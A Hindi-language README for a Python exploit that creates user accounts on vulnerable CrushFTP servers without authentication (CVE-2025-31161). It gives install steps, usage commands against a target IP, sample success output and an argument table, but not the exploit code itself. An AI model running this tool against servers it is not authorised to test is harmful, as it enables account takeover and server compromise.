
🛡️ CVE-2025-31161 - CrushFTP उपयोगकर्ता निर्माण प्रमाणीकरण बाईपास एक्सप्लॉइट

यह Python एक्सप्लॉइट CVE-2025-31161 के लिए कमजोर CrushFTP सर्वरों को लक्षित करता है। यह कमजोरी WebInterface पर एक तैयार किया गया XML पेलोड भेजकर बिना प्रमाणीकरण के उपयोगकर्ता खाता निर्माण की अनुमति देती है, जिसके परिणामस्वरूप संभावित रूप से पूर्ण सर्वर से समझौता हो सकता है।
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है।
उन प्रणालियों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
requestscoloramaDebian/Ubuntu:
sudo apt update
sudo apt install python3 python3-pip -y
CentOS/RHEL:
sudo yum install python3 python3-pip -y
macOS (Homebrew के साथ):
brew install python3
pip3 install requests colorama
python3 CVE-2025-31161.py --target_host <TARGET_IP> [--port <PORT>] [--target_user <ADMIN>] [--new_user <USERNAME>] [--password <PASSWORD>]
python3 CVE-2025-31161.py --target_host 192.168.1.100 --new_user backdoor --password P@ssw0rd!
[+] Preparing Payloads
[-] Warming up the target...
[-] Target is up and running
[+] Sending Account Create Request
[!] User created successfully!
[+] Exploit Complete! You can now login with:
[*] Username: AuthBypassAccount
[*] Password: CorrectHorseBatteryStaple
Gaurav Bhattacharjee (G4UR4V007)
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है।
| तर्क | विवरण | डिफ़ॉल्ट मान |
|---|
--target_host | (आवश्यक) लक्ष्य का IP या डोमेन | — |
--port | CrushFTP WebInterface का पोर्ट | 8080 |
--target_user | एडमिन उपयोगकर्ता नाम (पेलोड में प्रयुक्त) | crushadmin |
--new_user | नए अनधिकृत खाते के लिए उपयोगकर्ता नाम | AuthBypassAccount |
--password | नए उपयोगकर्ता के लिए पासवर्ड | CorrectHorseBatteryStaple |